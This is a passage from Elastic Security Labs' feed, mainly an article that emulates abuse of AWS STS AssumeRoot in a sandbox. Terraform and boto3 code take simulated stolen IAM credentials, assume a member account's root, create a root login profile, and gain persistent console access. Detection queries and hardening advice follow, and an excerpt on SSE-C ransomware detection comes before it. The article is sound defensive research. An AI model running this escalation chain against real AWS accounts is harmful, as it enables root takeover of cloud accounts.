<p>Cleanup for this emulation is relatively simple. If you choose to keep the S3 objects, start with Step 1, otherwise go straight to step 5.</p>
<ol>
<li>Go to <code>us-east-1</code> region</li>
<li>navigate to S3</li>
<li>locate the <code>s3-sse-c-ransomware-payroll-XX bucket</code></li>
<li>remove all objects</li>
<li>Command: <code>python s3\_sse\_c\_ransom.py cleanup</code></li>
</ol>
<p>Once completed, everything deployed initially will be removed.</p>
<h1>Detection and Hunting Strategies</h1>
<p>After our atomic emulation, it’s critical to share how we can effectively detect this ransom behavior based on the API event logs provided by AWS’ CloudTrail. Note that we will be leveraging <a href="https://www.elastic.co/es/elastic-stack">Elastic Stack</a> for data ingestion and initial query development; however, the query logic and context should be translatable to <a href="https://www.elastic.co/es/security/siem">your SIEM of choice</a>. It is also important to note that data events for S3 in your CloudTrail configuration should be set to “Log all events.”</p>
<h2>Unusual AWS S3 Object Encryption with SSE-C</h2>
<p>The goal of this detection strategy is to identify PutObject requests that leverage SSE-C, as customer-provided encryption keys can be a strong indicator of anomalous activity — especially if an organization primarily uses AWS-managed encryption through KMS (SSE-KMS) or S3's native encryption (SSE-S3).</p>
<p>In our emulation, <code>PutObject</code> requests were configured with the <code>x-amz-server-side-encryption-customer-algorithm</code> header set to <code>AES256</code>, signaling to AWS that customer-provided keys were used for encryption (SSE-C).</p>
<p>Fortunately, AWS CloudTrail logs these encryption details within request parameters, allowing security teams to detect unusual SSE-C usage. Key CloudTrail attributes to monitor include:</p>
<ul>
<li><em>SignatureVersion</em>: SigV4 → Signals that this request was signed</li>
<li><em>SSEApplied: SSE_C</em> → Signals that server-side customer key encryption was used</li>
<li><em>bucketName: s3-sse-c-ransomware-payroll-96</em> → Signals which bucket this happened to</li>
<li><em>x-amz-server-side-encryption-customer-algorithm: AES256</em> → Signals which algorithm was used for the customer encryption key</li>
<li><em>key: customer_data.csv</em> → Indicates the name of the object this was applied to</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image9.png" alt="Partial Elastic document from CloudTrail ingestion showing SSE-C request from emulation" /></p>
<p>With these details we can already craft a threat detection query that would match these events and ultimately the threat reported in the original Halcyon blog.</p>
<table>
<thead>
<tr>
<th align="left">event.dataset: &quot;aws.cloudtrail&quot; and event.provider: &quot;s3.amazonaws.com&quot; and event.action: &quot;PutObject&quot; and event.outcome: &quot;success&quot; and aws.cloudtrail.flattened.request_parameters.x-amz-server-side-encryption-customer-algorithm: &quot;AES256&quot; and aws.cloudtrail.flattened.additional_eventdata.SSEApplied: &quot;SSE_C&quot;</th>
</tr>
</thead>
</table>
<p>While this detection is broad, organizations should tailor it to their environment by asking:</p>
<ul>
<li>Do we expect pre-signed URLs with SigV4 for S3 bucket or object operations?</li>
<li>Do we expect SSE-C to be used for <em>PutObject</em> operations in S3 or this specific bucket?</li>
</ul>
<p><strong>Reducing False-Positives With New Term Rule Types</strong><br />
To minimize false positives (FPs), we can leverage Elastic’s <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html#create-new-terms-rule">New Terms rule type</a>, which helps detect first-time occurrences of suspicious activity. Instead of alerting on every match, we track unique combinations of IAM users and affected S3 buckets, only generating an alert when this behavior is observed for the first time within a set period. Some of the unique combinations we watch for are:</p>
<ul>
<li>Unique IAM users (ARNs) performing SSE-C encryption in S3.</li>
<li>Specific buckets where SSE-C is applied.</li>
</ul>
<p>These alerts only trigger if this activity has been observed for the first time in the last 14 days.</p>
<p>This adaptive approach ensures that legitimate use cases are learned over time, preventing repeated alerts on expected operations. At the same time, it flags anomalous first-time occurrences of SSE-C in S3, aiding in early threat detection. As needed, rule exceptions can be added for specific user identity ARNs, buckets, objects, or even source IPs to refine detection logic. By incorporating historical context and behavioral baselines, this method enhances signal fidelity, improving both the effectiveness of detections and the actionability of alerts.</p>
<p><strong>Rule References</strong></p>
<p><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml">Unusual AWS S3 Object Encryption with SSE-C</a><br />
<a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_s3_excessive_object_encryption_with_sse_c.toml">Excessive AWS S3 Object Encryption with SSE-C</a></p>
<h1>Conclusion</h1>
<p>We sincerely appreciate you taking the time to read this publication and, if you did, for trying out the emulation yourself. Whitebox testing plays a crucial role in cloud security, enabling us to replicate real-world threats, analyze their behavioral patterns, and develop effective detection strategies. With cloud-based attacks becoming increasingly prevalent, it is essential to understand the tooling behind adversary tactics and to share research findings with the broader security community.</p>
<p>If you're interested in exploring our AWS detection ruleset, you can find it here: <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/aws">Elastic AWS Detection Rules</a>. We also welcome <a href="https://github.com/elastic/detection-rules/tree/main?tab=readme-ov-file#how-to-contribute">contributions</a> to enhance our ruleset—your efforts help strengthen collective defenses, and we greatly appreciate them!</p>
<p>We encourage anyone with interest to review Halcyon’s publication and thank them ahead of time for sharing their research!</p>
<p>Until next time.</p>
<h1>Important References:</h1>
<p><a href="https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c">Halcyon Research Blog on SSE-C ItW</a><br />
<a href="https://gist.github.com/terrancedejesus/f703a4a37a70d005080950a418422ac9">Elastic Emulation Code for SSE-C in AWS</a><br />
<a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/aws">Elastic Pre-built AWS Threat Detection Ruleset</a><br />
<a href="https://github.com/elastic/detection-rules">Elastic Pre-built Detection Rules Repository</a><br />
Rule: <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml">Unusual AWS S3 Object Encryption with SSE-C</a><br />
Rule: <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_s3_excessive_object_encryption_with_sse_c.toml">Excessive AWS S3 Object Encryption with SSE-C</a></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/Security Labs Images 11.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Exploring AWS STS AssumeRoot]]></title>
            <link>https://www.elastic.co/es/security-labs/exploring-aws-sts-assumeroot</link>
            <guid>exploring-aws-sts-assumeroot</guid>
            <pubDate>Tue, 10 Dec 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore AWS STS AssumeRoot, its risks, detection strategies, and practical scenarios to secure against privilege escalation and account compromise using Elastic's SIEM and CloudTrail data.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Welcome to another installment of AWS detection engineering with Elastic. This article will dive into the new AWS Security Token Service(STS) API operation, AssumeRoot, simulate some practical behavior in a sandbox AWS environment, and explore detection capabilities within Elastic’s SIEM.</p>
<p>What to expect from this article:</p>
<ul>
<li>Basic insight into AWS STS web service</li>
<li>Insight into STS’ AssumeRoot API operation</li>
<li>Threat scenario using AssumeRoot with Terraform and Python code</li>
<li>Detection and hunting opportunities for potential AssumeRoot abuse</li>
</ul>
<h2>Understanding AWS STS and the AssumeRoot API</h2>
<p>AWS Security Token Service (STS) is a web service that enables users, accounts, and roles to request temporary, limited-privilege credentials. For IAM users, their accounts are typically registered in AWS Identity and Access Management (IAM), where either a login profile is attached for accessing the console or access keys, and secrets are created for programmatic use by services like Lambda, EC2, and others.</p>
<p>While IAM credentials are persistent, <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html#sts-regionalization"><strong>STS credentials</strong></a> are temporary. These credentials - comprising an access key, secret key, and session token - are granted upon request and are valid for a specific period. Requests are typically sent to the global <code>sts.amazonaws.com</code> endpoint, which responds with temporary credentials for a user or role. These credentials can then be used to access other AWS services on behalf of the specified user or role, as long as the action is explicitly allowed by the associated permission policy.</p>
<p>This process is commonly known as assuming a role, executed via the <a href="https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html"><code>AssumeRole</code></a> API. It is frequently used in AWS environments and organizations for various scenarios. For example:</p>
<ul>
<li>An EC2 instance with an attached role will automatically use <code>AssumeRole</code> to retrieve temporary credentials for API requests.</li>
<li>Similarly, Lambda functions often invoke <code>AssumeRole</code> to authenticate and perform their designated actions.</li>
</ul>
<p>Although <code>AssumeRole</code> is incredibly useful, it can pose a risk if roles are over-permissioned by the organization. Misconfigured policies with excessive permissions can allow adversaries to abuse these roles, especially in environments where the <a href="https://docs.aws.amazon.com/wellarchitected/latest/framework/sec_permissions_least_privileges.html">Principle of Least Privilege</a> (PoLP) is not strictly enforced. Note that the security risks associated with AssumeRole are typically attributed to misconfigurations or not following best security practices by organizations. These are not the result of AssumeRole or even AssumeRoot development decisions.</p>
<h3>Introduction to AssumeRoot</h3>
<p>AWS recently introduced the <code>AssumeRoot</code> API operation to STS. Similar to <code>AssumeRole</code>, it allows users to retrieve temporary credentials - but specifically for the <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html">root user</a> of a member account in an AWS organization.</p>
<h3>What Are Member Accounts?</h3>
<p>In AWS, <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_accounts_access.html">member accounts</a> are separate accounts within an organization that have their own IAM users, services, and roles. These accounts are distinct from the management account, but they still fall under the same organizational hierarchy. Each AWS organization is created with a unique root account tied to the email address used during its setup. Similarly, every member account requires a root user or email address at the time of its creation, effectively establishing its own root identity.</p>
<h3>How Does AssumeRoot Work?</h3>
<p>When a privileged user in the management account needs root-level privileges for a member account, they can use the <code>AssumeRoot</code> API to retrieve temporary credentials for the member account's root user. Unlike <code>AssumeRole</code>, where the target principal is a user ARN, the target principal for <code>AssumeRoot</code> is the member account ID itself. Additionally, a task policy ARN must be specified, which defines the specific permissions allowed with the temporary credentials.</p>
<p>Here are the available task policy ARNs for <code>AssumeRoot</code>:</p>
<ul>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-IAMAuditRootUserCredentials">IAMAuditRootUserCredentials</a></li>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-IAMCreateRootUserPassword">IAMCreateRootUserPassword</a></li>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-IAMDeleteRootUserCredentials">IAMDeleteRootUserCredentials</a></li>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-S3UnlockBucketPolicy">S3UnlockBucketPolicy</a></li>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-SQSUnlockQueuePolicy">SQSUnlockQueuePolicy</a></li>
</ul>
<h3>Potential Abuse of Task Policies</h3>
<p>While these predefined task policies limit what can be done with <code>AssumeRoot</code>, their scope can still be theoretically abused in the right circumstances. For example:</p>
<ul>
<li><strong>IAMCreateRootUserPassword</strong>: This policy grants the <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html"><code>iam:CreateLoginProfile</code></a> permission, allowing the creation of a login profile for a user that typically doesn't require console access. If an adversary gains access to programmatic credentials, they could create a login profile and gain console access to the account that is more persistent.</li>
<li><strong>IAMDeleteRootUserCredentials</strong>: This policy allows the deletion of root credentials, but also grants permissions like <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListAccessKeys.html"><code>iam:ListAccessKeys</code></a> and <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListMFADevices.html"><code>iam:ListMFADevices</code></a>. These permissions could help an adversary gather critical information about access credentials or MFA configurations for further exploitation.</li>
</ul>
<h2>AssumeRoot in Action</h2>
<p>Now that we understand how AssumeRoot works at a high level, how it differs from AssumeRole, and the potential risks associated with improper security practices, let’s walk through a practical scenario to simulate its usage. It should be noted that this is one of many potential scenarios where AssumeRoot may or could be abused. As of this article's publication, no active abuse has been reported in the wild, as expected with a newer AWS functionality.</p>
<p>Below is a simple depiction of what we will accomplish in the following sections:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image3.png" alt="AssumeRoot scenario workflow" /></p>
<p>Before diving in, it’s important to highlight that we’re using an admin-level IAM user configured as the default profile for our local AWS CLI. This setup enables us to properly configure the environment using <a href="https://developer.hashicorp.com/terraform">Terraform</a> and simulate potential threat scenarios in AWS for detection purposes.</p>
<h3>Member Account Creation</h3>
<p>The first step is to enable centralized root access for member accounts, as outlined in the <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_accounts.html">AWS documentation</a>. Centralized root access allows us to group all AWS accounts into a single organization, with each member account having its own root user.</p>
<p>Next, we manually create a member account within our organization through the Accounts section in the AWS Management Console. For this scenario, the key requirement is to note the member account ID, a unique 12-digit number. For our example, we’ll assume this ID is <code>000000000001</code> and name it <em>AWSAssumeRoot</em>. Centralized management of AWS accounts is a common practice for organizations that may separate different operational services into separate AWS accounts but want to maintain centralized management.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image4.png" alt="AWS console showing management account and member account AWSAssumeRoot" /></p>
<p>We also add the member account as the <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_delegate_policies.html">delegated administrator</a> for centralized root access as well, which allows that root member account to have centralized root access for any other member accounts of the organization.</p>
<p>While we won’t cover it in depth, we have also enabled the new <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_rcps.html">Resource control policies</a> (RCPs) within Identity and Access Management (IAM), which will allow central administration over permissions granted to resources within accounts in our organization, but by default, the <em>RCPFullAWSAccess</em> policy allows all permissions to all services for all principals and is attached directly to root.</p>
<h3>Environment Setup</h3>
<p>For our simulation, we use Terraform to create an overly permissive IAM user named compromised_user. This user is granted the predefined <a href="https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess.html">AdministratorAccess</a> policy, which provides admin-level privileges. Additionally, we generated an access key for this user while intentionally omitting a login profile to reflect a typical setup where credentials are used programmatically. This is not an uncommon practice, especially in developer environments.</p>
<p>Below is the <code>main.tf</code> configuration used to create the resources:</p>
<pre><code>provider &quot;aws&quot; {
  region = var.region
}

data &quot;aws_region&quot; &quot;current&quot; {}

# Create an IAM user with AdministratorAccess (simulated compromised user)
resource &quot;aws_iam_user&quot; &quot;compromised_user&quot; {
  name = &quot;CompromisedUser&quot;
}

# Attach AdministratorAccess Policy to the compromised user
resource &quot;aws_iam_user_policy_attachment&quot; &quot;compromised_user_policy&quot; {
  user       = aws_iam_user.compromised_user.name
  policy_arn = &quot;arn:aws:iam::aws:policy/AdministratorAccess&quot;
}

# Create access keys for the compromised user
resource &quot;aws_iam_access_key&quot; &quot;compromised_user_key&quot; {
  user = aws_iam_user.compromised_user.name
}
</code></pre>
<p>We also define an <code>outputs.tf</code> file to capture key details about the environment, such as the region, access credentials, and the user ARN:</p>
<pre><code>output &quot;aws_region&quot; {
  description = &quot;AWS Region where the resources are deployed&quot;
  value       = var.region
}

output &quot;compromised_user_access_key&quot; {
  value       = aws_iam_access_key.compromised_user_key.id
  sensitive   = true
  description = &quot;Access key for the compromised IAM user&quot;
}

output &quot;compromised_user_secret_key&quot; {
  value       = aws_iam_access_key.compromised_user_key.secret
  sensitive   = true
  description = &quot;Secret key for the compromised IAM user&quot;
}

output &quot;compromised_user_name&quot; {
  value       = aws_iam_user.compromised_user.name
  description = &quot;Name of the compromised IAM user&quot;
}

output &quot;compromised_user_arn&quot; {
  value       = aws_iam_user.compromised_user.arn
  description = &quot;ARN of the compromised IAM user&quot;
}
</code></pre>
<p>Once we run <code>terraform apply</code>, the configuration creates a highly permissive IAM user (<code>compromised_user</code>) with associated credentials. These credentials simulate those that an adversary might obtain for initial access or escalating privileges.</p>
<p>This is one of the first hurdles for an adversary, collecting valid credentials. In today’s threat landscape information stealer malware and phishing campaigns are more common than ever, aimed at obtaining credentials that can be sold or used for lateral movement. While this is a hurdle, the probability of compromised credentials for initial access is high - such as those with <a href="https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider_0.pdf">SCATTERED SPIDER</a> and <a href="https://sysdig.com/blog/scarleteel-2-0/">SCARLETEEL</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image1.png" alt="" /></p>
<h3>Establish an STS Client Session with Stolen Credentials</h3>
<p>The next step is to establish an STS client session using the compromised credentials (<code>compromised_user</code> access key and secret key). This session allows the adversary to make requests to AWS STS on behalf of the compromised user.</p>
<p>Here’s the Python code to establish the STS client using the <a href="https://aws.amazon.com/sdk-for-python/">AWS Boto3 SDK</a> (the AWS SDK used to create, configure, and manage AWS services, such as Amazon EC2 and Amazon S3). This Python code is used to create the STS client with stolen IAM user credentials:</p>
<pre><code> sts_client = boto3.client(
     &quot;sts&quot;,
     aws_access_key_id=compromised_access_key,
     aws_secret_access_key=compromised_secret_key,
     region_name=region,
     endpoint_url=f'https://sts.{region}.amazonaws.com'
 )
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image7.png" alt="Terminal output when creating STS client with stolen IAM user credentials" /></p>
<p><strong>Note:</strong> During testing, we discovered that the <code>endpoint_url</code> must explicitly point to <code>https://sts.&lt;region&gt;.amazonaws.com</code>. Omitting this may result in an <code>InvalidOperation</code> error when attempting to invoke the <code>AssumeRoot</code> API.</p>
<p>This STS client session forms the foundation for simulating an adversary's actions as we have taken compromised credentials and initiated our malicious actions.</p>
<h3>Assume Root for Member Account on Behalf of Compromised User</h3>
<p>After establishing an STS client session as the compromised user, we can proceed to call the AssumeRoot API. This request allows us to assume the root identity of a member account within an AWS Organization. For the request, the TargetPrincipal is set to the member account ID we obtained earlier, the session duration is set to 900 seconds (15 minutes), and the TaskPolicyArn is defined as <code>IAMCreateRootUserPassword</code>. This policy scopes the permissions to actions related to creating or managing root login credentials.</p>
<p>A notable permission included in this policy is <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html"><code>CreateLoginProfile</code></a>, which enables the creation of a login password for the root user. This allows access to the AWS Management Console as the root user.</p>
<p>Below is the Python code to assume root of member account <code>000000000001</code>, with permissions scoped by <em>IAMCreateRootUserPassword</em>.</p>
<pre><code>response = sts_client.assume_root(
    TargetPrincipal=member_account_id,
    DurationSeconds=900,
    TaskPolicyArn={&quot;arn&quot;: &quot;arn:aws:iam::aws:policy/root-task/IAMCreateRootUserPassword&quot;},
)
root_temp_creds = response[&quot;Credentials&quot;]
</code></pre>
<p>If the AssumeRoot request is successful, the response provides temporary credentials (<code>root_temp_creds</code>) for the root account of the target member. These credentials include an access key, secret key, and session token, enabling temporary root-level access for the duration of the session.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image6.png" alt="Terminal output showing AssumeRoot with IAMCreateRootUserPassword for AWSAssumeRoot member account
" /></p>
<h3>Creating a Login Profile for the Member Root Account</h3>
<p>With temporary root credentials in hand, the next step is to establish an authenticated IAM client session as the root user of the member account. Using this session, we can call the <code>create_login_profile()</code> method. This method allows us to assign a login password to the root user, enabling console access.</p>
<p>The following Python code establishes an authenticated IAM client and creates a login profile:</p>
<pre><code>iam_client = boto3.client(
    &quot;iam&quot;,
    aws_access_key_id=root_temp_creds[&quot;AccessKeyId&quot;],
    aws_secret_access_key=root_temp_creds[&quot;SecretAccessKey&quot;],
    aws_session_token=root_temp_creds[&quot;SessionToken&quot;],
)

response = iam_client.create_login_profile()
</code></pre>
<p>It’s worth noting that the <code>create_login_profile()</code> method requires no explicit parameters for the root user, as it acts on the credentials of the currently authenticated session. In this case, it will apply to the root user of the member account.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image5.png" alt="Terminal output showing IAM client established as Root member account and CreateLoginProfile request" /></p>
<h3>Reset the Administrator Password and Login to the AWS Console</h3>
<p>At this stage, we’re nearly complete! Let’s recap the progress so far:</p>
<ol>
<li>Using compromised IAM user credentials, we established an STS session to assume the identity of an overly permissive user.</li>
<li>Leveraging this session, we assumed the identity of the root user of a target member account, acquiring temporary credentials scoped to the <code>IAMCreateRootUserPassword</code> task policy.</li>
<li>With these temporary root credentials, we established an IAM client session and successfully created a login profile for the root user.</li>
</ol>
<p>The final step involves resetting the root user password to gain permanent access to the AWS Management Console. To do this, visit the AWS console login page and attempt to log in as the root user. Select the “Forgot Password” option to initiate the password recovery process. This will prompt a CAPTCHA challenge, after which a password reset link is sent to the root user’s email address. This would be the third roadblock for an adversary as they would need access to the root user’s email inbox to continue with the password reset workflow. It should be acknowledged that if <em>CreateLoginProfile</em> is called, you can specify the password for the user and enforce a “password reset required”. However, this is not allowed for root accounts by default, and for good reason by AWS. Unlike the first hurdle of having valid credentials, access to a user’s inbox may prove more difficult and less likely, but again, with enough motivation and resources, it is still possible.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image2.png" alt="Password recovery request from AWS sign-in for root" /></p>
<p>After selecting the password reset link, you can set a new password for the root user. This step provides lasting access to the console as the root user. Unlike the temporary credentials obtained earlier, this access is no longer limited by the session duration or scoped permissions of the IAMCreateRootUserPassword policy, granting unrestricted administrative control over the member account.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image8.png" alt="Successful login as root for AWSAssumeRoot member account" /></p>
<p><strong>Before moving on, if you followed along and tried this in your environment, we want to gently remind you to use Terraform to remove testing resources</strong> using the terraform destroy command in the same folder where you initialized and deployed the resources.</p>
<h2>Detection and Hunting Opportunities</h2>
<p>While exploring cloud features and APIs from an adversary's perspective is insightful, our ultimate responsibility lies in detecting and mitigating malicious or anomalous behavior, alerting stakeholders, and responding effectively. Also, while such a scenario has not been publicly documented in the wild, we should not wait to be a victim either and be reactive, hence the reason for our whitebox scenario.</p>
<p>The following detection and hunting queries rely on AWS CloudTrail data ingested into the Elastic Stack using the <a href="https://www.elastic.co/es/docs/current/integrations/aws">AWS integration</a>. If your environment differs, you may need to adjust these queries for custom ingestion processes or adapt them for a different SIEM or query tool.</p>
<p><strong>Note:</strong> Ensure that AWS CloudTrail is enabled for all accounts in your organization to provide comprehensive visibility into activity across your AWS environment. You may also need to enable the specific trail used for monitoring across the entire organization so all member accounts are observed properly.</p>
<h3>Hunting - Unusual Action for IAM User Access Key</h3>
<p>This query identifies potentially compromised IAM access keys that are used to make unusual API calls. It sorts the results in ascending order to surface less frequent API calls within the last two weeks. This query can be adjusted to account for different API calls or include other CloudTrail-specific fields.</p>
<p>Hunting Query: <a href="https://github.com/elastic/detection-rules/blob/7b88b36d294407cc1ea2ab1b0acbbbf3104162a9/hunting/aws/docs/iam_unusual_access_key_usage_for_user.md">AWS IAM Unusual AWS Access Key Usage for User</a></p>
<p>MITRE ATT&amp;CK:</p>
<ul>
<li>T1078.004 - <a href="https://attack.mitre.org/techniques/T1078/004/">Valid Accounts: Cloud Accounts</a></li>
</ul>
<p>Language: ES|QL</p>
<pre><code>FROM logs-aws.cloudtrail*
| WHERE @timestamp &gt; now() - 14 day
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot;
    and event.outcome == &quot;success&quot;
    and aws.cloudtrail.user_identity.access_key_id IS NOT NULL
    and aws.cloudtrail.resources.arn IS NOT NULL
    and event.action NOT IN (&quot;GetObject&quot;)
| EVAL daily_buckets = DATE_TRUNC(1 days, @timestamp)
| STATS
    api_counts = count(*) by daily_buckets, aws.cloudtrail.user_identity.arn, aws.cloudtrail.user_identity.access_key_id, aws.cloudtrail.resources.arn, event.action
| WHERE api_counts &lt; 2
| SORT api_counts ASC
</code></pre>
<h3>Detection - Unusual Assume Root Action by Rare IAM User</h3>
<p>Detection Rule: <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml">AWS STS AssumeRoot by Rare User and Member Account</a></p>
<p>This query identifies instances where the <code>AssumeRoot</code> API call is made by an IAM user ARN and member account that have not performed this action in the last 14 days. This anomaly-based detection uses Elastic’s <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html#create-new-terms-rule">New Terms</a> detection rule.</p>
<ul>
<li>The <code>aws.cloudtrail.user_identity.arn</code> field identifies the source IAM user from the management AWS account.</li>
<li>The <code>aws.cloudtrail.resources.account_id</code> field reflects the target member account.</li>
</ul>
<p>MITRE ATT&amp;CK:</p>
<ul>
<li>T1548.005 - <a href="https://attack.mitre.org/techniques/T1548/005/">Temporary Elevated Cloud Access</a></li>
<li>T1098.003 - <a href="https://attack.mitre.org/techniques/T1098/003/">Additional Cloud Roles</a></li>
</ul>
<p>Language: KQL</p>
<pre><code>event.dataset: &quot;aws.cloudtrail&quot;
    and event.provider: &quot;sts.amazonaws.com&quot;
    and event.action: &quot;AssumeRoot&quot;
    and event.outcome: &quot;success&quot;
</code></pre>
<p>New Term Fields:<br />
If any combination of these fields has not been seen executing AssumeRoot within the last 14 days, an alert is generated.</p>
<ul>
<li><code>aws.cloudtrail.user_identity.arn</code></li>
<li><code>aws.cloudtrail.resources.account_id</code></li>
</ul>
<h3>Detection - Self-Created Login Profile for Root Member Account</h3>
<p>This query detects instances where a login profile is created for a root member account by the root account itself, potentially indicating unauthorized or anomalous behavior.</p>
<p>Detection Rule: <a href="https://github.com/elastic/detection-rules/blob/4374128458d116211d5d22993b6d87f6c82a30a0/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml">AWS IAM Login Profile Added for Root</a></p>
<p>MITRE ATT&amp;CK:</p>
<ul>
<li>T1098.003 - <a href="https://attack.mitre.org/techniques/T1098/003/">Account Manipulation: Additional Cloud Roles</a></li>
<li>T1548.005 - <a href="https://attack.mitre.org/techniques/T1548/005/">Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access</a></li>
<li>T1078.004 - <a href="https://attack.mitre.org/techniques/T1078/004/">Valid Accounts: Cloud Accounts</a></li>
</ul>
<p>Language: ES|QL</p>
<pre><code>FROM logs-aws.cloudtrail* 
| WHERE
    // filter for CloudTrail logs from IAM
    event.dataset == &quot;aws.cloudtrail&quot;
    and event.provider == &quot;iam.amazonaws.com&quot;
    // filter for successful CreateLoginProfile API call
    and event.action == &quot;CreateLoginProfile&quot;
    and event.outcome == &quot;success&quot;
    // filter for Root member account
    and aws.cloudtrail.user_identity.type == &quot;Root&quot;
    // filter for an access key existing which sources from AssumeRoot
    and aws.cloudtrail.user_identity.access_key_id IS NOT NULL
    // filter on the request parameters not including UserName which assumes self-assignment
    and NOT TO_LOWER(aws.cloudtrail.request_parameters) LIKE &quot;*username*&quot;
| keep
    @timestamp,
    aws.cloudtrail.request_parameters,
    aws.cloudtrail.response_elements,
    aws.cloudtrail.user_identity.type,
    aws.cloudtrail.user_identity.arn,
    aws.cloudtrail.user_identity.access_key_id,
    cloud.account.id,
    event.action,
    source.address
    source.geo.continent_name,
    source.geo.region_name,
    source.geo.city_name,
    user_agent.original,
    user.id
</code></pre>
<p>These detections are specific to our scenario, however, are not fully inclusive regarding all potential AssumeRoot abuse. If you choose to explore and discover some additional hunting or threat detection opportunities, feel free to share in our <a href="https://github.com/elastic/detection-rules">Detection Rules</a> repository or the <a href="https://github.com/elastic/detection-rules/tree/main/hunting">Threat Hunting</a> library of ours.</p>
<h2>Hardening Practices for AssumeRoot Use</h2>
<p>AWS <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html">documentation</a> contains several important considerations for best security practices regarding IAM, STS, and many other services. However, cloud security is not a “one size fits all” workflow and security practices should be tailored to your environment, risk-tolerance, and more.</p>
<p><strong>Visibility is Key:</strong> If you can’t see it, you can’t protect it. Start by enabling CloudTrail with organization-wide trails to log activity across all accounts. Focus on capturing IAM and STS operations for insights into access and permission usage. Pair this with Security Hub for continuous monitoring and tools like Elastic or GuardDuty to hunt for unusual AssumeRoot actions.</p>
<p><strong>Lock Down AssumeRoot Permissions:</strong> Scope AssumeRoot usage to critical tasks only, like audits or recovery, by restricting task policies to essentials like IAMAuditRootUserCredentials. Assign these permissions to specific roles in the management account and keep those roles tightly controlled. Regularly review and remove unnecessary permissions to maintain the PLoP.</p>
<p><strong>MFA and Guardrails for Root Access:</strong> Enforce MFA for all users, especially those with access to AssumeRoot. Use AWS Organizations to disable root credential recovery unless absolutely needed and remove unused root credentials entirely. RCPs can help centralize and tighten permissions for tasks involving AssumeRoot or other sensitive operations.</p>
<h1>Conclusion</h1>
<p>We hope this article provides valuable insight into AWS’ AssumeRoot API operation, how it can be abused by adversaries, and some threat detection and hunting guidance. Abusing AssumeRoot is one of many living-off-the-cloud (LotC) techniques that adversaries have the capability to target, but we encourage others to explore, research, and share their findings accordingly with the community and AWS.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/Security Labs Images 20.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Elevate Your Threat Hunting with Elastic]]></title>
            <link>https://www.elastic.co/es/security-labs/elevate-your-threat-hunting</link>
            <guid>elevate-your-threat-hunting</guid>
            <pubDate>Fri, 18 Oct 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic is releasing a threat hunting package designed to aid defenders with proactive detection queries to identify actor-agnostic intrusions.]]></description>
            <content:encoded><![CDATA[<p>We are excited to announce a new resource in the Elastic <a href="https://github.com/elastic/detection-rules">Detection Rules</a> repository: a collection of hunting queries powered by various Elastic query languages!</p>
